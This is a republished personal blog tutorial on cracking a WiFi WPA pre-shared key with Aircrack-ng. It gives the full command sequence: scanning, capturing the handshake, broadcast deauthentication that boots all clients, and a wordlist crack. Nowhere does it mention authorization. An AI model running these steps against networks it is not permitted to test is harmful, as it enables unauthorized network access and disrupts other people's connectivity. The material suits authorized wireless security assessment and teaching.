This blog post was originally published on John Tagita’s personal site, https://attackd0gz.com, on November 5, 2019. That post can be found here: https://attackd0gz.com/2019/11/05/how-to-crack-wifi-protected-access-wpa-pre-shared-key-psk/
This is going to be a short post on cracking WPA PSK in order to gain access to a WiFi network. The key to accomplishing this is the suite of tools called Aircrack-NG. Aircrack-ng is a complete suite of tools to assess WiFi network security. On their website, they offer tons of ways of getting support and asking questions, such as (Forum, GitHub, IRC: #aircrack-ng on Freenode).
The first thing to do is to figure out which interface you have on your machine which is capable of WiFi communication. You can do that through the command
# iw dev
Once you have figured out which interface you will be using (wlan0 in our case), you can use the following command to view all networks present in the vicinity on the 2.4 band:
# airodump-ng wlan0
So we can now see that we have only one SSID available on the 2.4 band, and it is operating on channel 6. The next step is to fix our interface on channel 6, and capture all the packets that we can, and write them to a file named “capture”. IMPORTANT NOTE: you need to keep this capture going during the deauth sequence, or else you will not capture the 4-way handshake. We can do that using the following command:
# airodump-ng wlan0 -c 6 -w capture
This is awesome, and now we can see that there is a client also connected to the AP as well. The way that this attack works is that you need to capture the 4-way handshake in order to launch it. We can ensure that the client who is currently connected has to re-accomplish that 4-way handshake by kicking him or her off the network so that they are required to re-authenticate. We do this by sending “de-auth” packets to the broadcast address, essentially booting everyone off of the network. The command to do this in our case, is:
# aireplay-ng -0 100 -a A2:E9:68:D3:03:10 wlan0
So now we know that the client got disconnected from the network and had to re-authenticate. We captured the 4-way handshake using the airodump command, wrote the entire sequence out to a file called “capture”, and under the “Notes” section in the image below, you can see that the output shows “EAPoL”, which, according to Andrii K, in the StackExchange reply here, “EAPoL is an authentication protocol which is also used in WPA/WPA2. Its utility is to authenticate a user and establish a shared data from which the future encryption key will be derived.”
So now we are cleared hot to attempt to crack the PSK using the data that we have captured to this point. Use the following command to accomplish this:
# aircrack-ng -w 100-common-passwords.txt capture.cap
Boom. So we have cracked the WPA PSK and are now able to authenticate as a valid user to the WiFi access point.
For some further knowledge, you can read a really cool jamming attack using the de-authentication command that Mike Szczys wrote about here.